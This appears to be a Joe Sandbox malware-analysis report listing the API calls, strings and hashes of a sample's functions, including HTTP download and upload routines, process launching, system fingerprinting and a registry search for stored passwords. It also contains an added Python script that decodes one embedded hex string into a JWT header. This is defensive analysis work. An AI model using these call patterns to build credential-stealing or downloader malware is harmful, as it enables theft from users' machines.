                                                                                     • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                    • API String ID: 3532888709-1526165396
                                                                                    • Opcode ID: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                                                                    • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                                                                    • Opcode Fuzzy Hash: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                                                                    • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                                                                    APIs
                                                                                      • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                                                      • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                                                      • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                                                      • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                                                    • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                                                                    • StrCmpCA.SHLWAPI(?,02E35CA0), ref: 00406147
                                                                                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                                                                    • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                                                                    • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                                                                    • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                                                                    • InternetCloseHandle.WININET(a+A), ref: 00406253
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00406260
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                    • String ID: a+A$a+A
                                                                                    • API String ID: 4287319946-2847607090
                                                                                    • Opcode ID: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                                                                    • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                                                                                    • Opcode Fuzzy Hash: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                                                                    • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                    • memset.MSVCRT ref: 02D20E83
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D20E9C
                                                                                    • lstrcat.KERNEL32(?,00420D7C), ref: 02D20EAE
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D20EC4
                                                                                    • lstrcat.KERNEL32(?,00420D80), ref: 02D20ED6
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D20EEF
                                                                                    • lstrcat.KERNEL32(?,00420D84), ref: 02D20F01
                                                                                    • lstrlen.KERNEL32(?), ref: 02D20F0E
                                                                                    • memset.MSVCRT ref: 02D20F34
                                                                                    • memset.MSVCRT ref: 02D20F48
                                                                                      • Part of subcall function 02D2AA87: lstrlen.KERNEL32(02D1516C,?,?,02D1516C,00420DDE), ref: 02D2AA92
                                                                                      • Part of subcall function 02D2AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 02D2AAEC
                                                                                      • Part of subcall function 02D28DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02D11660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02D28DED
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                      • Part of subcall function 02D2AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D2AA4D
                                                                                      • Part of subcall function 02D29927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,02D20DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 02D29948
                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 02D20FC1
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02D20FCD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                                                    • String ID:
                                                                                    • API String ID: 1395395982-0
                                                                                    • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                                                                    • Instruction ID: eb2ff12f2a8a1fd8aba087575ee1b9afd4f5e532f48fc9463542bfa569dd869d
                                                                                    • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                                                                    • Instruction Fuzzy Hash: 3E8173B5540228ABCB14EBA0DD55FED733AEF64708F4041A9A30666181EF746F8CCF69
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                    • memset.MSVCRT ref: 02D20E83
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D20E9C
                                                                                    • lstrcat.KERNEL32(?,00420D7C), ref: 02D20EAE
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D20EC4
                                                                                    • lstrcat.KERNEL32(?,00420D80), ref: 02D20ED6
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02D20EEF
                                                                                    • lstrcat.KERNEL32(?,00420D84), ref: 02D20F01
                                                                                    • lstrlen.KERNEL32(?), ref: 02D20F0E
                                                                                    • memset.MSVCRT ref: 02D20F34
                                                                                    • memset.MSVCRT ref: 02D20F48
                                                                                      • Part of subcall function 02D2AA87: lstrlen.KERNEL32(02D1516C,?,?,02D1516C,00420DDE), ref: 02D2AA92
                                                                                      • Part of subcall function 02D2AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 02D2AAEC
                                                                                      • Part of subcall function 02D28DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,02D11660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 02D28DED
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                      • Part of subcall function 02D2AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D2AA4D
                                                                                      • Part of subcall function 02D29927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,02D20DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 02D29948
                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 02D20FC1
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02D20FCD
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                                                    • String ID:
                                                                                    • API String ID: 1395395982-0
                                                                                    • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                                                                    • Instruction ID: f7b6372da1bf565f6ba48547baa02418b656742cf726a47a12141662e2e70d8c
                                                                                    • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                                                                    • Instruction Fuzzy Hash: 8B61A0B5500228ABCB14EBA0DD55FED733AEF64708F0041A9E70666181EE746F8CCF69
                                                                                    APIs
                                                                                      • Part of subcall function 02D2AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D2AA4D
                                                                                      • Part of subcall function 02D14A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A51
                                                                                      • Part of subcall function 02D14A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A68
                                                                                      • Part of subcall function 02D14A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A7F
                                                                                      • Part of subcall function 02D14A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02D14AA0
                                                                                      • Part of subcall function 02D14A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02D14AB0
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 02D14B7C
                                                                                    • StrCmpCA.SHLWAPI(?,0064A480), ref: 02D14BA1
                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02D14D21
                                                                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 02D1504F
                                                                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 02D1506B
                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 02D1507F
                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 02D150B0
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02D15114
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02D1512C
                                                                                    • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 02D14D7C
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02D15136
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                                                    • String ID:
                                                                                    • API String ID: 2402878923-0
                                                                                    • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                                                                    • Instruction ID: c6c95f754425588f7ab3e67cd48afeb7e6b34ab77d26e0df9514999c18067318
                                                                                    • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                                                                    • Instruction Fuzzy Hash: 0B120D76910228EACB15EB90DD91FEEB37AEF64704F504199A10672690EF742F8CCF61
                                                                                    APIs
                                                                                      • Part of subcall function 02D2AA07: lstrcpy.KERNEL32(?,00000000), ref: 02D2AA4D
                                                                                      • Part of subcall function 02D14A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A51
                                                                                      • Part of subcall function 02D14A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A68
                                                                                      • Part of subcall function 02D14A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 02D14A7F
                                                                                      • Part of subcall function 02D14A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 02D14AA0
                                                                                      • Part of subcall function 02D14A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 02D14AB0
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                    • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 02D16548
                                                                                    • StrCmpCA.SHLWAPI(?,0064A480), ref: 02D1656A
                                                                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02D1659C
                                                                                    • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 02D165EC
                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 02D16626
                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02D16638
                                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 02D16664
                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 02D166D4
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02D16756
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02D16760
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 02D1676A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 3074848878-0
                                                                                    • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                                                                    • Instruction ID: cae13be36d6458997da5fd77148582edaadc7a2079683e5c145733ea24d304d2
                                                                                    • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                                                                    • Instruction Fuzzy Hash: D0715D75A40218EBDF24DFA0DC48BEE7779EF44704F104199E10A6B690DBB4AE88CF91
                                                                                    APIs
                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 02D292D3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateGlobalStream
                                                                                    • String ID:
                                                                                    • API String ID: 2244384528-0
                                                                                    • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                                                                    • Instruction ID: 96e74743658be0de6c415780994231d34519cd4771814f738d4bcfff03c5d893
                                                                                    • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                                                                    • Instruction Fuzzy Hash: 9E710BB9A40218ABDB14DFE4DD94FEEB7B9FF58304F108108F505A7290DB34A905CB61
                                                                                    APIs
                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                                                                    • memset.MSVCRT ref: 0041716A
                                                                                    • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                                                                    Strings
                                                                                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                                                                    • sA, xrefs: 004172AE, 00417179, 0041717C
                                                                                    • sA, xrefs: 00417111
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: OpenProcesslstrcpymemset
                                                                                    • String ID: sA$sA$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                                                    • API String ID: 224852652-2614523144
                                                                                    • Opcode ID: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                                                                    • Instruction ID: ffe5c4151d56689e238fca5affca6521033e0b5082b25a646ea50ffb364ad3ac
                                                                                    • Opcode Fuzzy Hash: 83bc95c561d3c7d7ec3f072c7b35a55b7f907de0dec64aa1652b34b8f8455e89
                                                                                    • Instruction Fuzzy Hash: 71515FB0D04218ABDB14EB91DD85BEEB774AF04304F1040AEE61576281EB786AC9CF5D
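The string the plugin lists at xref 0041718C in the routine above is printed as space-separated hex bytes. Those bytes are ASCII for a base64 string, and that base64 decodes to the JSON text { "typ": "JWT", "alg": "EdDSA" }, i.e. a JSON Web Token header. The report does not show what the routine does with it, so nothing beyond the decoded bytes is claimed here. The Python below is an added decoder written for this page, not code from the Joe Sandbox report or from the sample: it peels hex and base64 layers until the data stops being printable text or stops matching either alphabet, then parses the innermost layer as JSON when it is JSON. The only input is the string copied from the listing above.

```python
import base64
import binascii
import json
import re
from typing import Any, List, Optional, Tuple

# Input copied from the "Strings" entry at xref 0041718C above.
ENCODED = ("65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 "
           "62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30")

HEX_RE = re.compile(r"(?:[0-9A-Fa-f]{2})+")
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def printable(data: bytes) -> bool:
    """Accept a layer only if it is plain text; this stops ordinary words
    such as "Password" from being 'decoded' as base64 into binary junk."""
    return all(32 <= b < 127 or b in (9, 10, 13) for b in data)


def peel(value: str, max_layers: int = 5) -> List[Tuple[str, str]]:
    """Strip nested hex/base64 encodings, recording (encoding, decoded text)
    for every layer that was actually removed."""
    layers: List[Tuple[str, str]] = []
    current = value
    for _ in range(max_layers):
        compact = re.sub(r"\s+", "", current)
        if HEX_RE.fullmatch(compact):
            raw = bytes.fromhex(compact)
            kind = "hex"
        elif B64_RE.fullmatch(compact) and len(compact) >= 8:
            try:
                # Re-add padding the report may have dropped; validate=True rejects stray characters.
                raw = base64.b64decode(compact + "=" * (-len(compact) % 4), validate=True)
            except binascii.Error:
                break
            kind = "base64"
        else:
            break
        if not printable(raw):
            break
        current = raw.decode("ascii")
        layers.append((kind, current))
    return layers


def decode_report_string(value: str) -> Tuple[List[Tuple[str, str]], Optional[Any]]:
    """Peel encodings and parse the innermost layer as JSON if it is JSON."""
    layers = peel(value)
    innermost = layers[-1][1] if layers else value
    try:
        return layers, json.loads(innermost)
    except json.JSONDecodeError:
        return layers, None


if __name__ == "__main__":
    found, parsed = decode_report_string(ENCODED)
    for kind, text in found:
        print(f"{kind:>6}: {text}")
    print("parsed:", parsed)
```

The printable-text check is what keeps the decoder from producing false layers: eight-character words match the base64 alphabet, but their decoded bytes are not text, so they are left alone.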
                                                                                    APIs
                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 02D277A9
                                                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02D277E6
                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D2786A
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D27871
                                                                                    • wsprintfA.USER32 ref: 02D278A7
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                                                    • String ID: :$C$\$B
                                                                                    • API String ID: 1544550907-183544611
                                                                                    • Opcode ID: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                                                    • Instruction ID: 9c0a16c952575d069cddceb950254be6bce0ed4d2b051186c1f758f345ebbfb0
                                                                                    • Opcode Fuzzy Hash: ca458c9d44e2395dbd5c279e9f95348a2013c015fe5135b8dbe94f3e61db761a
                                                                                    • Instruction Fuzzy Hash: EE416EB1D40268EBDB10DF94CC45BEEBBB9EF58704F000199E505A7380D775AE88CBA5
                                                                                    APIs
                                                                                      • Part of subcall function 004072D0: memset.MSVCRT ref: 00407314
                                                                                      • Part of subcall function 004072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,00407C90), ref: 0040733A
                                                                                      • Part of subcall function 004072D0: RegEnumValueA.ADVAPI32(00407C90,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 004073B1
                                                                                      • Part of subcall function 004072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040740D
                                                                                      • Part of subcall function 004072D0: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407452
                                                                                      • Part of subcall function 004072D0: HeapFree.KERNEL32(00000000,?,?,?,?,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?), ref: 00407459
                                                                                    • lstrcatA.KERNEL32(00000000,004217FC,00407C90,80000001,004161C4,?,?,?,?,?,00407C90,?,?,004161C4), ref: 00407606
                                                                                    • lstrcatA.KERNEL32(00000000,00000000,00000000), ref: 00407648
                                                                                    • lstrcatA.KERNEL32(00000000, : ), ref: 0040765A
                                                                                    • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040768F
                                                                                    • lstrcatA.KERNEL32(00000000,00421804), ref: 004076A0
                                                                                    • lstrcatA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004076D3
                                                                                    • lstrcatA.KERNEL32(00000000,00421808), ref: 004076ED
                                                                                    • task.LIBCPMTD ref: 004076FB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmp
                                                                                     • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                                                    • String ID: :
                                                                                    • API String ID: 3191641157-3653984579
                                                                                    • Opcode ID: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                                                                    • Instruction ID: 32096a17696354d86885d8553091bec757242b1065822f319004c721f0fd16b2
                                                                                    • Opcode Fuzzy Hash: 991097200e3f3986b00727b8e04d0ccc938683cf049b1a3c2dcf1bd456b0a09d
                                                                                    • Instruction Fuzzy Hash: FE316B79E40109EFCB04FBE5DC85DEE737AFB49305B14542EE102B7290DA38A942CB66
                                                                                    APIs
                                                                                    • lstrcpy.KERNEL32(?,?), ref: 02D21642
                                                                                      • Part of subcall function 02D29047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 02D29072
                                                                                      • Part of subcall function 02D294C7: StrStrA.SHLWAPI(?,?), ref: 02D294D3
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 02D2167E
                                                                                      • Part of subcall function 02D294C7: lstrcpyn.KERNEL32(0064AB88,?,?), ref: 02D294F7
                                                                                      • Part of subcall function 02D294C7: lstrlen.KERNEL32(?), ref: 02D2950E
                                                                                      • Part of subcall function 02D294C7: wsprintfA.USER32 ref: 02D2952E
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 02D216C6
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 02D2170E
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 02D21755
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 02D2179D
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 02D217E5
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 02D2182C
                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 02D21874
                                                                                      • Part of subcall function 02D2AA87: lstrlen.KERNEL32(02D1516C,?,?,02D1516C,00420DDE), ref: 02D2AA92
                                                                                      • Part of subcall function 02D2AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 02D2AAEC
                                                                                    • strtok_s.MSVCRT ref: 02D219B7
